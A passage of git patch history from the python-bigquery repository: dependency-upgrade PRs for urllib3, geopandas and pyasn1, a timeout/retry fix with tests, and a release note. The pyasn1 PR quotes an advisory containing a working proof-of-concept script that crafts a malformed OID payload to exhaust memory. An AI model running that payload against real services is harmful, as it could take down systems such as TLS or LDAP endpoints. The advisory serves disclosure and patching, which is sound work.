![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.6.0/2.6.3?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-21441](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409). ### Affected usages Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. ### Remediation Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source. --- ### Release Notes
urllib3/urllib3 (urllib3) ### [`v2.6.3`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#263-2026-01-07) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.2...2.6.3) \================== - Fixed a high-severity security issue where decompression-bomb safeguards of the streaming API were bypassed when HTTP redirects were followed. (`GHSA-38jv-5279-wg99 `\_\_) - Started treating `Retry-After` times greater than 6 hours as 6 hours by default. (`#​3743 `\_\_) - Fixed `urllib3.connection.VerifiedHTTPSConnection` on Emscripten. (`#​3752 `\_\_) ### [`v2.6.2`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#262-2025-12-11) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.1...2.6.2) \================== - Fixed `HTTPResponse.read_chunked()` to properly handle leftover data in the decoder's buffer when reading compressed chunked responses. (`#​3734 `\_\_) ### [`v2.6.1`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#261-2025-12-08) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.0...2.6.1) \================== - Restore previously removed `HTTPResponse.getheaders()` and `HTTPResponse.getheader()` methods. (`#​3731 `\_\_)
--- ### Configuration πŸ“… **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. β™» **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. πŸ”• **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). Co-authored-by: Anthonios Partheniou --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ec5c7f2af..dd94deab6 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 -urllib3==2.6.0 +urllib3==2.6.3 From 24d45d0d5bf89762f253ba6bd6fdbee9d5993422 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 29 Jan 2026 13:23:16 -0500 Subject: [PATCH 198/202] fix: updates timeout/retry code to respect hanging server (#2408) **Description** This PR fixes a crash when handling `_InactiveRpcError` during retry logic and ensures proper `timeout` propagation in `RowIterator.to_dataframe`. **Fixes** **Retry Logic Crash**: Addressed an issue in `google/cloud/bigquery/retry.py` where `_should_retry` would raise a `TypeError` when inspecting unstructured `gRPC` errors (like `_InactiveRpcError`). The fix adds robust error inspection to fallback gracefully when `exc.errors` is not subscriptable. **Timeout Propagation**: Added the missing `timeout` parameter to `RowIterator.to_dataframe` in `google/cloud/bigquery/table.py`. This ensures that the user-specified `timeout` is correctly passed down to the underlying `to_arrow` call, preventing the client from hanging indefinitely when the Storage API is unresponsive. **Changes** Modified `google/cloud/bigquery/retry.py`: Updated `_should_retry` to handle `TypeError` and `KeyError` when accessing `exc.errors`. Modified `google/cloud/bigquery/table.py`: Updated `RowIterator.to_dataframe` signature and implementation to accept and pass the `timeout` parameter. The first half of this work was completed in PR #2354 --- google/cloud/bigquery/_pandas_helpers.py | 49 +++++++-- google/cloud/bigquery/dbapi/cursor.py | 2 + google/cloud/bigquery/retry.py | 16 ++- google/cloud/bigquery/table.py | 6 +- tests/unit/job/test_query_pandas.py | 6 ++ tests/unit/test__pandas_helpers.py | 131 +++++++++++++++++++++++ tests/unit/test_client_retry.py | 7 +- tests/unit/test_dbapi_cursor.py | 6 +- tests/unit/test_table.py | 8 ++ 9 files changed, 214 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 5460f7ca7..7bd9f99b6 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -33,6 +33,7 @@ from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers +from google.cloud.bigquery import retry as bq_retry from google.cloud.bigquery import schema @@ -740,7 +741,7 @@ def _row_iterator_page_to_arrow(page, column_names, arrow_types): return pyarrow.RecordBatch.from_arrays(arrays, names=column_names) -def download_arrow_row_iterator(pages, bq_schema): +def download_arrow_row_iterator(pages, bq_schema, timeout=None): """Use HTTP JSON RowIterator to construct an iterable of RecordBatches. Args: @@ -751,6 +752,10 @@ def download_arrow_row_iterator(pages, bq_schema): Mapping[str, Any] \ ]]): A decription of the fields in result pages. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pyarrow.RecordBatch` The next page of records as a ``pyarrow`` record batch. @@ -759,8 +764,16 @@ def download_arrow_row_iterator(pages, bq_schema): column_names = bq_to_arrow_schema(bq_schema) or [field.name for field in bq_schema] arrow_types = [bq_to_arrow_data_type(field) for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + if timeout is None: + for page in pages: + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) def _row_iterator_page_to_dataframe(page, column_names, dtypes): @@ -778,7 +791,7 @@ def _row_iterator_page_to_dataframe(page, column_names, dtypes): return pandas.DataFrame(columns, columns=column_names) -def download_dataframe_row_iterator(pages, bq_schema, dtypes): +def download_dataframe_row_iterator(pages, bq_schema, dtypes, timeout=None): """Use HTTP JSON RowIterator to construct a DataFrame. Args: @@ -792,14 +805,27 @@ def download_dataframe_row_iterator(pages, bq_schema, dtypes): dtypes(Mapping[str, numpy.dtype]): The types of columns in result data to hint construction of the resulting DataFrame. Not all column types have to be specified. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pandas.DataFrame` The next page of records as a ``pandas.DataFrame`` record batch. """ bq_schema = schema._to_schema_fields(bq_schema) column_names = [field.name for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + + if timeout is None: + for page in pages: + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) def _bqstorage_page_to_arrow(page): @@ -928,6 +954,7 @@ def _download_table_bqstorage( if "@" in table.table_id: raise ValueError("Reading from a specific snapshot is not currently supported.") + start_time = time.monotonic() requested_streams = determine_requested_streams(preserve_order, max_stream_count) requested_session = bigquery_storage.types.stream.ReadSession( @@ -944,10 +971,16 @@ def _download_table_bqstorage( ArrowSerializationOptions.CompressionCodec(1) ) + retry_policy = ( + bq_retry.DEFAULT_RETRY.with_deadline(timeout) if timeout is not None else None + ) + session = bqstorage_client.create_read_session( parent="projects/{}".format(project_id), read_session=requested_session, max_stream_count=requested_streams, + retry=retry_policy, + timeout=timeout, ) _LOGGER.debug( @@ -983,8 +1016,6 @@ def _download_table_bqstorage( # Manually manage the pool to control shutdown behavior on timeout. pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) wait_on_shutdown = True - start_time = time.time() - try: # Manually submit jobs and wait for download to complete rather # than using pool.map because pool.map continues running in the @@ -1006,7 +1037,7 @@ def _download_table_bqstorage( while not_done: # Check for timeout if timeout is not None: - elapsed = time.time() - start_time + elapsed = time.monotonic() - start_time if elapsed > timeout: wait_on_shutdown = False raise concurrent.futures.TimeoutError( diff --git a/google/cloud/bigquery/dbapi/cursor.py b/google/cloud/bigquery/dbapi/cursor.py index 014a6825e..bffd7678f 100644 --- a/google/cloud/bigquery/dbapi/cursor.py +++ b/google/cloud/bigquery/dbapi/cursor.py @@ -323,6 +323,8 @@ def _bqstorage_fetch(self, bqstorage_client): read_session=requested_session, # a single stream only, as DB API is not well-suited for multithreading max_stream_count=1, + retry=None, + timeout=None, ) if not read_session.streams: diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 19012efd6..6fd458df5 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -12,12 +12,15 @@ # See the License for the specific language governing permissions and # limitations under the License. +import logging + from google.api_core import exceptions from google.api_core import retry import google.api_core.future.polling from google.auth import exceptions as auth_exceptions # type: ignore import requests.exceptions +_LOGGER = logging.getLogger(__name__) _RETRYABLE_REASONS = frozenset( ["rateLimitExceeded", "backendError", "internalError", "badGateway"] @@ -61,14 +64,17 @@ def _should_retry(exc): """Predicate for determining when to retry. - We retry if and only if the 'reason' is 'backendError' - or 'rateLimitExceeded'. + We retry if and only if the 'reason' is in _RETRYABLE_REASONS or is + in _UNSTRUCTURED_RETRYABLE_TYPES. """ - if not hasattr(exc, "errors") or len(exc.errors) == 0: - # Check for unstructured error returns, e.g. from GFE + try: + reason = exc.errors[0]["reason"] + except (AttributeError, IndexError, TypeError, KeyError): + # Fallback for when errors attribute is missing, empty, or not a dict + # or doesn't contain "reason" (e.g. gRPC exceptions). + _LOGGER.debug("Inspecting unstructured error for retry: %r", exc) return isinstance(exc, _UNSTRUCTURED_RETRYABLE_TYPES) - reason = exc.errors[0]["reason"] return reason in _RETRYABLE_REASONS diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 195461006..88b673a8b 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2152,7 +2152,10 @@ def to_arrow_iterable( timeout=timeout, ) tabledata_list_download = functools.partial( - _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema + _pandas_helpers.download_arrow_row_iterator, + iter(self.pages), + self.schema, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, @@ -2366,6 +2369,7 @@ def to_dataframe_iterable( iter(self.pages), self.schema, dtypes, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 4390309f1..e0e0438f5 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -179,6 +179,8 @@ def test_to_dataframe_bqstorage_preserve_order(query, table_read_options_kwarg): parent="projects/test-project", read_session=expected_session, max_stream_count=1, # Use a single stream to preserve row order. + retry=None, + timeout=None, ) @@ -593,6 +595,8 @@ def test_to_dataframe_bqstorage(table_read_options_kwarg): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, # Use default number of streams for best performance. + retry=None, + timeout=None, ) bqstorage_client.read_rows.assert_called_once_with(stream_id) @@ -644,6 +648,8 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, + retry=None, + timeout=None, ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index a1cbb726b..6ec62c0b6 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -2252,3 +2252,134 @@ def fast_download_stream( results = list(result_gen) assert results == ["result_page"] + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_arrow_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + + # Mock page with to_arrow method + mock_page = mock.Mock() + mock_page.to_arrow.return_value = pyarrow.RecordBatch.from_arrays( + [pyarrow.array(["foo"])], + names=["name"], + ) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + # First page yields quickly + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_arrow_row_iterator( + pages_gen(), bq_schema, timeout=timeout + ) + + # First item should always succeed + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + # Should succeed and complete + results = list(iterator) + assert len(results) == 1 # 1 remaining item + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_dataframe_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + dtypes = {} + + # Mock page + mock_page = mock.Mock() + # Mock iterator for _row_iterator_page_to_dataframe checking next(iter(page)) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_dataframe_row_iterator( + pages_gen(), bq_schema, dtypes, timeout=timeout + ) + + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + results = list(iterator) + assert len(results) == 1 + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires `google-cloud-bigquery-storage`" +) +def test_download_arrow_bqstorage_passes_timeout_to_create_read_session( + module_under_test, +): + # Mock dependencies + project_id = "test-project" + table = mock.Mock() + table.table_id = "test_table" + table.to_bqstorage.return_value = "projects/test/datasets/test/tables/test" + + bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + # Mock create_read_session to return a session with no streams so the function returns early + # (Checking start of loop logic vs empty streams return) + session = mock.Mock() + # If streams is empty, _download_table_bqstorage returns early, which is fine for this test + session.streams = [] + bqstorage_client.create_read_session.return_value = session + + # Call the function + timeout = 123.456 + # download_arrow_bqstorage yields frames, so we need to iterate to trigger execution + list( + module_under_test.download_arrow_bqstorage( + project_id, table, bqstorage_client, timeout=timeout + ) + ) + + # Verify timeout and retry were passed + bqstorage_client.create_read_session.assert_called_once() + _, kwargs = bqstorage_client.create_read_session.call_args + assert "timeout" in kwargs + assert kwargs["timeout"] == timeout + + assert "retry" in kwargs + retry_policy = kwargs["retry"] + assert retry_policy is not None + # Check if deadline is set correctly in the retry policy + assert retry_policy._deadline == timeout diff --git a/tests/unit/test_client_retry.py b/tests/unit/test_client_retry.py index 6e49cc464..f0e7ac88f 100644 --- a/tests/unit/test_client_retry.py +++ b/tests/unit/test_client_retry.py @@ -23,6 +23,11 @@ PROJECT = "test-project" +# A deadline > 1.0s is required because the default retry (google.api_core.retry.Retry) +# has an initial delay of 1.0s. If the deadline is <= 1.0s, the first retry attempt +# (scheduled for now + 1.0s) will be rejected immediately as exceeding the deadline. +_RETRY_DEADLINE = 10.0 + def _make_credentials(): import google.auth.credentials @@ -83,7 +88,7 @@ def test_call_api_applying_custom_retry_on_timeout(global_time_lock): "api_request", side_effect=[TimeoutError, "result"], ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + retry = DEFAULT_RETRY.with_deadline(_RETRY_DEADLINE).with_predicate( lambda exc: isinstance(exc, TimeoutError) ) diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index 6fca4cec0..c5cad8c91 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -480,7 +480,11 @@ def fake_ensure_bqstorage_client(bqstorage_client=None, **kwargs): data_format=bigquery_storage.DataFormat.ARROW, ) mock_bqstorage_client.create_read_session.assert_called_once_with( - parent="projects/P", read_session=expected_session, max_stream_count=1 + parent="projects/P", + read_session=expected_session, + max_stream_count=1, + retry=None, + timeout=None, ) # Check the data returned. diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 97a1b4916..a8397247d 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -4125,6 +4125,10 @@ def test_to_dataframe_tqdm_error(self): # Warn that a progress bar was requested, but creating the tqdm # progress bar failed. for warning in warned: # pragma: NO COVER + # Pyparsing warnings appear to be coming from a transitive + # dependency and are unrelated to the code under test. + if "Pyparsing" in warning.category.__name__: + continue self.assertIn( warning.category, [UserWarning, DeprecationWarning, tqdm.TqdmExperimentalWarning], @@ -6853,6 +6857,8 @@ def test_to_arrow_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) @@ -6888,4 +6894,6 @@ def test_to_dataframe_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) From d5cc42b71726fef46715587df6379c325979667a Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:18:49 +0000 Subject: [PATCH 199/202] chore(deps): update dependency geopandas to v1.1.2 [security] (#2411) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [geopandas](https://redirect.github.com/geopandas/geopandas) | `==1.1.1` β†’ `==1.1.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/geopandas/1.1.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/geopandas/1.1.1/1.1.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2025-69662](https://nvd.nist.gov/vuln/detail/CVE-2025-69662) SQL injection vulnerability in geopandas before v.1.1.2 allows an attacker to obtain sensitive information via the to_postgis()` function being used to write GeoDataFrames to a PostgreSQL database. --- ### Release Notes
geopandas/geopandas (geopandas) ### [`v1.1.2`](https://redirect.github.com/geopandas/geopandas/blob/HEAD/CHANGELOG.md#Version-112-December-22-2025) [Compare Source](https://redirect.github.com/geopandas/geopandas/compare/v1.1.1...v1.1.2) Bug fixes: - Fix an issue that caused an error in `GeoDataFrame.from_features` when there is no `properties` field ([#​3599](https://redirect.github.com/geopandas/geopandas/issues/3599)). - Fix `read_file` and `to_file` errors ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)) - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)) - `value_counts` on GeoSeries now preserves CRS in index ([#​3669](https://redirect.github.com/geopandas/geopandas/issues/3669)) - Fix f-string placeholders appearing in error messages when `pyogrio` cannot be imported ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)). - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)). - `.to_json` now provides a clearer error message when called on a GeoDataFrame without an active geometry column ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Calling `del gdf["geometry"]` now will downcast to a `pd.DataFrame` if there are no geometry columns left in the dataframe ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Fix SQL injection in `to_postgis` via geometry column name ([#​3681](https://redirect.github.com/geopandas/geopandas/issues/3681)).
--- ### Configuration πŸ“… **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. β™» **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. πŸ”• **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index dd94deab6..ab8d6b6f9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -10,7 +10,7 @@ db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' -geopandas==1.1.1; python_version >= '3.10' +geopandas==1.1.2; python_version >= '3.10' google-api-core==2.25.2 google-auth==2.41.1 google-cloud-bigquery==3.38.0 From 80ca3f5b6be483220cbefae1241c855de92690a0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:50:09 +0000 Subject: [PATCH 200/202] chore(deps): update dependency pyasn1 to v0.6.2 [security] (#2407) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` β†’ `==0.6.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/pyasn1/0.6.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pyasn1/0.6.1/0.6.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq) ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024)) print("[*] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[*] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 256**2: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 256**3: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[*] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[*] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[*] Test completed") ``` Screenshots with the results: #### DoS Screenshot_20251219_160840 Screenshot_20251219_152815 #### Leak analysis A potential heap leak was investigated but came back clean: ``` [*] Creating 1000KB payload... [*] Decoding with pyasn1... [*] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [*] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @​..... @​.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @​..... @​.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @​..... @​..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @​..... @​..... @​. [*] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. ### Recommendation Add a limit to the allowed bytes in the decoder. --- ### Release Notes
pyasn1/pyasn1 (pyasn1) ### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026) [Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) - CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007) - Added support for Python 3.14 [pr #​97](https://redirect.github.com/pyasn1/pyasn1/pull/97) - Added SECURITY.md policy - Fixed unit tests failing due to missing code [issue #​91](https://redirect.github.com/pyasn1/pyasn1/issues/91) [pr #​92](https://redirect.github.com/pyasn1/pyasn1/pull/92) - Migrated to pyproject.toml packaging [pr #​90](https://redirect.github.com/pyasn1/pyasn1/pull/90)
--- ### Configuration πŸ“… **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. β™» **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. πŸ”• **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ab8d6b6f9..5f4d686b3 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -27,7 +27,7 @@ packaging==25.0 pandas==2.3.3 proto-plus==1.26.1 pyarrow==21.0.0 -pyasn1==0.6.1 +pyasn1==0.6.2 pyasn1-modules==0.4.2 pycparser==2.23 pyparsing==3.2.5 From e8184fa38563b8e9aef265ec64836a931e9e89cd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 12 Feb 2026 13:26:35 -0500 Subject: [PATCH 201/202] chore: librarian release pull request: 20260212T105312Z (#2415) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.8.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.40.1 ## [3.40.1](https://togithub.com/googleapis/python-bigquery/compare/v3.40.0...v3.40.1) (2026-02-12) ### Bug Fixes * updates timeout/retry code to respect hanging server (#2408) ([24d45d0d](https://togithub.com/googleapis/python-bigquery/commit/24d45d0d)) * add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20](https://togithub.com/googleapis/python-bigquery/commit/4f67ba20)) ### Documentation * clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432](https://togithub.com/googleapis/python-bigquery/commit/73228432))
